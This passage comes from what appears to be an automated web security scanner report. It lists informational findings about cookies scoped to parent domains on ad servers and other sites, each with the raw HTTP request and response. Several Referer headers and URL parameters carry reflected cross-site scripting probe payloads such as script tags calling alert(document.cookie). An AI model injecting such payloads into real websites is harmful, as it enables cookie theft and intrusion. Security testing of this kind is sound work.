Set-Cookie: rsi_us_1000000=pUMd5U+DfxIU7WxyqNQb+zH1s17HozKcX9zb1nGBmx1V/jUVnfeldtQjURXj62Ij5rwYZ9wJ1NqZFDtPnA/ai2kzB4ZWck4RlBED9tHPfALbjG5/h+EbQvknzyyRcrItMoJol6PXNTl/OKv1HLyRjqxPdUMPuhTeFrZcyO8gAu7DnkKRicwv26rJbnB2YkIMVwnyQe25v0bF8cRbuIDVa248qh0eMMOfyR/FXEsxPsbCZDweM7dbepZIWR3dtd+dVimkWAYQoZALNR+V/guGHuxfyVd2gEOLAGwOQllMhFXpg30hoPoVfJhXFUqiQNm3BzjM0qe3oej3+PsACj2CU61hVKeF2HNY9k2ol1ixdYUyhZXc+csbq2QEngScG8Fyk28f3CtFfcgafRot2T5UJdsjwU///O8q5QLpNWARM1w/lHLi6xhWyV7RPg2RTuUehxIA5X1CDzhakTy4gchBqLYpsImsUgwLdediq5xOCZUg5jzSYFUo7zRvJUElYuphp8OzQ1AQryrdIBXfr2Q7k0pOTQtw0Sya6irERSdIDFN9xHQEpu/KZi/VfFED67ADmmemfMMNlbnugnmTr6LTfKuLWuw4QB8ULOl4ICmXLj6pBD/5tNcSMJWTFHOixo4IK0vkutnkoKUs/dGDMVzfYfICMrfqYm5ooaMqvnmJ2DAzQJTYRF4vDA6NPTQcbJifGlogyZA5q8lXRY25R+s5rcSx1LACJzBJtIrHnrtl8SXouSQzf3kTOxNhVDItJBmmUFdwuBsLv9W3DOHJYpGPu7/HeVRht67vcq4vWMq3VbvT2WCZWCAVmSFQIlAkZlXJXT993g==; Domain=.revsci.net; Expires=Fri, 16-Jan-2043 21:06:44 GMT; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 24 Jan 2011 21:06:44 GMT
Content-Length: 822

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

13.61. http://ads.traderonline.com/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.traderonline.com
Path:	/RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OAX=rcHW8009oaoAAx1V; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.traderonline.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/www.traderonline.com/traderonline/1888828924@Right1? HTTP/1.1
Host: ads.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:58:34 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW8009oaoAAx1V; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.traderonline.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 475
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660;path=/

document.write ('<A HREF="http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f41
...[SNIP]...

13.62. http://adserver.teracent.net/tase/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imp=a$le#1295921988188_58040565_as2108_imp|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:48 GMT; Path=/tase

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/ad?AdBoxType=16&url=HI_ATC_Q4_HP&inv=autotrader&adId=t_736917&esc=0&rnd=838005&rcu=http://adserving.autotrader.com/event.ng/Type=click&FlightID=850600&AdID=2117284&TargetID=216438&ASeg=&AMod=&Segments=16718,17659,19280,19287,37200,41196,42568,51045,53802,93061,97293,107723,108064,112527,113656,116342,126077,132791,134700,140537,141190,142846,144937,146126,146297,146313,148888,149643&Targets=259945,259951,259957,259963,259969,259975,259981,155805,272133,216438,238656,262343,215180,217333,267376,267611,279401,271887,272977&Values=307,310,320,325,1168,1626,1638,1686,1720,1969,2016,2760,2796,2799,4690,7532,10209,10274,10433,11866,19959,34058,35455,36491,36879,37550,39460,39471,42434,42492,42493,43920&RawValues=PAGE_INSTANCEID%2C095352382072745203%2CTIMEID%2C1295921986&Redirect= HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://www.autotrader.com/?bc4cb%22%3balert(document.cookie)//1ee177b82c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295889980185_145363176_ap2100_int|

Response

13.63. http://adserver.teracent.net/tase/redir/1295921988188_58040565_as2108_imp/vew previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.teracent.net
Path:	/tase/redir/1295921988188_58040565_as2108_imp/vew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

imp=a$le#1295921992907_58231589_as2103_vew|285#1295921988188_58040565_as2108_imp|; Domain=.teracent.net; Expires=Sun, 24-Jul-2011 02:19:52 GMT; Path=/tase

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1295921988188_58040565_as2108_imp/vew?q=H4sIAAAAAAAAAFWPPW7DMAyFr0KKlCii2jl56BoYOkIB_wjp6CEpPDTJcXqoXqa0kRrtQOC9xw984Pf89bKO5QSUgw-QZEzd04kwCf26zJn4cJpV0kGmpDHlv075cJAZDhJUkVNvY0Fb5uKJEyESpETWxi3wHsiqTtrwsQUh7aGQ2NvQ1nIKXs0M2LnQQEC7AALtnwQEwuh3O9jWQrQLFIi9rdf_LZUVI7JwXUZntK6fg92G86UQAlSESrEC1pArqi_ae3m9T-22PK7WCvmrMYLkhMi2Ps5lmdu9Tcv1MtlQSNl-AMndVvZlAQAA&act=vew&idx=[0]&com=swf&rnd=1295921994463 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://pcdn.tcgmsrv.net/tase/swf/toyota-inmarket/toyota_inmarket_300.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=MoWMI9J.4ChiO7o; imp=a$le#1295921988188_58040565_as2108_imp|285#1295921988188_58040565_as2108_imp|

Response

13.64. https://adwords.google.com/select/Login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://adwords.google.com
Path:	/select/Login

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

S=awfe=c3-nwyM08wJoLoe4Gp08HQ:awfe-efe=c3-nwyM08wJoLoe4Gp08HQ; Domain=.google.com; Path=/; Secure; HttpOnly
S_awfe=7AL-4jBW0TtLsFXXpFfRzA; Domain=.google.com; Path=/; Secure; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /select/Login HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: I=O/umuC0BAAA=.9QCH/JbBItRG1yn60m2UCA==.0IZeB50Usnw8TuDV3HtosQ==; Path=/select; Secure; HttpOnly
Set-Cookie: S=awfe=c3-nwyM08wJoLoe4Gp08HQ:awfe-efe=c3-nwyM08wJoLoe4Gp08HQ; Domain=.google.com; Path=/; Secure; HttpOnly
Set-Cookie: S_awfe=7AL-4jBW0TtLsFXXpFfRzA; Domain=.google.com; Path=/; Secure; HttpOnly
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Location: /um/StartNewLogin
Date: Mon, 24 Jan 2011 15:01:47 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="/um/StartNewLogin">here</A>.
</BODY>
</HTML>

13.65. http://ak1.abmr.net/is/r1-ads.ace.advertising.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ak1.abmr.net
Path:	/is/r1-ads.ace.advertising.com

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

01AI=2-2-E74B5E0BA5732C35BC52F42A6AAFD162E9E3C651AE0BE96BFC6B936C6BF32537-9E7777269A9BB1AAE2C4010D7B5CF320CCEC2B7369606790ED15668E1191BC18; expires=Tue, 24-Jan-2012 21:08:39 GMT; path=/; domain=.abmr.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /is/r1-ads.ace.advertising.com?U=/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1&V=3-%2fmHdV%2fSxID49%2fY3rKxMK4v+7iK9zQp8Trq285f3hOfOA%2fRinTOf8SX2thSjDHleWAQBFwlhcryU%3d&I=17D7C736696B8AA&D=r1.ace.advertising.com&01AD=1& HTTP/1.1
Host: ak1.abmr.net
Proxy-Connection: keep-alive
Referer: http://www.abbreviations.com/bs.aspx?st=b1.aspx51536%3Cscript%3Ealert(document.cookie)%3C/script%3E7a00ceef170&SE=3&r=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 01AI=2-2-B80F4175F833E42619203875B6A13D4E1441FE75A7BB1C5368154550679EAB18-CC167F5656F9E658F14A37A7A688219EBE41C044BE8EA8E25C20763073A7C846

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1?01AD=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w&01RI=17D7C736696B8AA&01NA=
Expires: Mon, 24 Jan 2011 21:08:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 21:08:39 GMT
Connection: close
Set-Cookie: 01AI=2-2-E74B5E0BA5732C35BC52F42A6AAFD162E9E3C651AE0BE96BFC6B936C6BF32537-9E7777269A9BB1AAE2C4010D7B5CF320CCEC2B7369606790ED15668E1191BC18; expires=Tue, 24-Jan-2012 21:08:39 GMT; path=/; domain=.abmr.net
P3P: policyref="http://www.abmr.net/w3c/policy.xml", CP="NON DSP COR CURa ADMa DEVa OUR SAMa IND"

13.66. http://as2.whdh.com/m/m.php/1295906131129/m.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as2.whdh.com
Path:	/m/m.php/1295906131129/m.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; expires=Sun, 24-Apr-2011 21:54:26 GMT; path=/; domain=.whdh.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/m.php/1295906131129/m.gif HTTP/1.1
Host: as2.whdh.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:54:26 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie2: WHDHSTR=173.193.214.243.1295906066204705; path=/
X-Powered-By: PHP/5.1.6
Set-Cookie: WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; expires=Sun, 24-Apr-2011 21:54:26 GMT; path=/; domain=.whdh.com
location: /m/m.php?pass=2&1295906066
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.67. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UA=AAAAAQAU5FRWDkay5gNIBniL3nCP0n0K9AIDA3gBY2BgYGZg_F7OwBLYwsDwT4SB4VQyAwODOAMDo25GXH4gA2O3HwPz36VIcqJgudhrXgxMAV4MLJd_IckB9QP1xS44DzQDDHzthBoYmBgYZugzMjAyMLDkMPEzCQAZjLq7zn9zgqgBAClnGck-; Domain=.amgdgt.com; Expires=Thu, 24-Feb-2011 01:35:47 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=10660&rnd=1596989115 HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAUaMxGSGTK5Wp9qxNESW3w7hCyFHoAAJFcc59Mh0I7lruTfrzkOUgAAAEtaF2gzw--; LO=AAAAAQAUTb0ojsGjTYemMhM8.wPqufZbuW0BAHVzYTt0eDs2MjM7ZGFsbGFzOzc1MjA3O3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjticm9hZGJhbmQ7MTczLjE5My4yMTQuMjQz; UA=AAAAAQAU6LV_14AmMYMgOwrAn3GlJXyBz.oDA3gBY2BgYGZg_F7OwBLYwsDwT4SB4VQyAwODOAMDo25GXH4gA2O3HwPz36VIcqJgudhrXgxMAV4MLJd_IckB9QP1xS44DzQDDHw1fjUwMDIwsOQwAi2CGBrNwAS2kmFGAesCoBzYHIbNvhAOkA8APJMd4Q--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAU5FRWDkay5gNIBniL3nCP0n0K9AIDA3gBY2BgYGZg_F7OwBLYwsDwT4SB4VQyAwODOAMDo25GXH4gA2O3HwPz36VIcqJgudhrXgxMAV4MLJd_IckB9QP1xS44DzQDDHzthBoYmBgYZugzMjAyMLDkMPEzCQAZjLq7zn9zgqgBAClnGck-; Domain=.amgdgt.com; Expires=Thu, 24-Feb-2011 01:35:47 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://cdn.amgdgt.com/base/pixels/transparent.gif
Content-Length: 0
Date: Tue, 25 Jan 2011 01:35:46 GMT

13.68. http://b.collective-media.net/seg/cm/de18_1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.collective-media.net
Path:	/seg/cm/de18_1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

cli=11ddec103f853dc; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 02:27:23 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /seg/cm/de18_1 HTTP/1.1
Accept: */*
Referer: http://www.soundingsonline.com/archives?'"--></style></script><script>alert(0x001E2B)</script>
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: b.collective-media.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 25 Jan 2011 02:27:23 GMT
Content-Type: image/gif
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: cli=11ddec103f853dc; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 02:27:23 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

13.69. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 22:20:55 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=3005693&rn=575395576&c7=http%3A%2F%2Ftweetmeme.com%2F&c3=3&c4=http%3A%2F%2Fwww.tweetmeme.com&c8=TweetMeme%20-%20Search%20and%20Retweet%20the%20Hottest%20Stories&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 24 Jan 2011 22:20:55 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 22:20:55 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

13.70. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 15:58:37 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035740&d.c=gif&d.o=detraderonline&d.x=87575725&d.t=page&d.u=http%3A%2F%2Fwww.traderonline.com%2Fx22ec89d%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E93a08fbf703&d.r=http%3A%2F%2Fburp%2Fshow%2F5 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 24 Jan 2011 15:58:37 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Wed, 23-Jan-2013 15:58:37 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.71. http://bh.contextweb.com/bh/set.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

V=gFEcJzqCjXJj; Domain=.contextweb.com; Expires=Thu, 19-Jan-2012 21:55:49 GMT; Path=/
cwbh1=2709%3B02%2F23%2F2011%3BTOT09; Domain=.contextweb.com; Expires=Tue, 29-Dec-2015 21:55:49 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.72. http://bid.openx.net/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

p=1295929661; version=1; path=/; domain=.openx.net; max-age=63072000;
fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0D7MwAAAxUfwuA8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_32728599221&pid=7f43337b-cb6f-453f-9ae5-4abd7cd18bda&s=728x90&f=0.1&cid=oxpv1%3A58349-98644-254472-4738-17101&hrid=39925b34906404a722d1479181f4316b-1295921102&url=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe; s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; p=1295921102; _wc[1295921102372]=H4sIAAAAAAAAAONgYGRg0D7MwcDEwNCxkYOBmYEh_zwDANrv7-sWAAAA

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: _wc[1295921102372]=; version=1; path=/; domain=.openx.net; max-age=0;
Set-Cookie: p=1295929661; version=1; path=/; domain=.openx.net; max-age=63072000;
Set-Cookie: fc=H4sIAAAAAAAAAONlYOTgYWBgYGRg0D7MwAAAxUfwuA8AAAA=; version=1; path=/; domain=.openx.net; max-age=31536000;

(function(){var req={f:OXM_32728599221,o:null,w:10720000,c:"\u003cscript type\u003d'text/javascript'\u003evar isIE \u003d false;\u003c/script\u003e\u003c!--[if IE]\u003e\u003cscript type\u003d'text/ja
...[SNIP]...

13.73. http://bid.openx.net/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/json

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; version=1; path=/; domain=.openx.net;
p=1295921102; version=1; path=/; domain=.openx.net; max-age=63072000;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /json?c=OXM_15781025984&pid=7f43337b-cb6f-453f-9ae5-4abd7cd18bda&s=468x60&f=0.1&cid=oxpv1%3A58349-98644-254472-4738-17099&hrid=dda27c0e92ce176b4b94dc8a5861a24c-1295921101&url=http%3A%2F%2Fwww.netlingo.com%2F HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=iso-8859-1
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1295921102; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_15781025984({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAGWQO07DQBRFzzixM_aYW
...[SNIP]...

13.74. http://bid.openx.net/log previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.openx.net
Path:	/log

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_wc[1295921102372]=H4sIAAAAAAAAAONgYGRg0D7MwcDEwNCxkYOBmYEh_zwDANrv7-sWAAAA; version=1; path=/; domain=.openx.net; max-age=2592000;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /log?l=H4sIAAAAAAAAAGWQO07DQBRFzzixM_aYWIi_AJOCLrKwQ_A4DTQUUIQGsYEopmUDFKFBSNT0bIE10MMqkFgGM_4EIaaZ9-7c0bnvKQRwqOflJC_mWTI-SUfJeJaVyUyP0qRIdV7q7PY414XEmZ4efYS4svrkeHRA0jW1lLgwfJd48PQm6cHdZ4Q0Les4xtk1Ds_oEh9Fn4hV1thih2122WePOMK3fvMU2LtjMA6eIrbNzfV5wIF9Rj4vAga0J8SrE_GbSA-qRPe-TSQWLzaRyC-bRAKvYTkmTb_hOZYnCadnD1f_oeLx9S-0FxDUtYiVGam1h43jS7GyFPuNOFFmulqsNgFuYBa0BGzU5feFYrP1_QBQiO-kpAEAAA==&l_xyz=8_28623 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=8e1bb757-a622-431b-967f-869e18a071fe; s=9be4e4e2-589c-4bbb-b5f5-bab9ba09b572; p=1295921102

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 42
Pragma: no-cache
Set-Cookie: _wc[1295921102372]=H4sIAAAAAAAAAONgYGRg0D7MwcDEwNCxkYOBmYEh_zwDANrv7-sWAAAA; version=1; path=/; domain=.openx.net; max-age=2592000;

GIF89a.............!.......,...........D.;

13.75. http://blogsearch.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogsearch.google.com
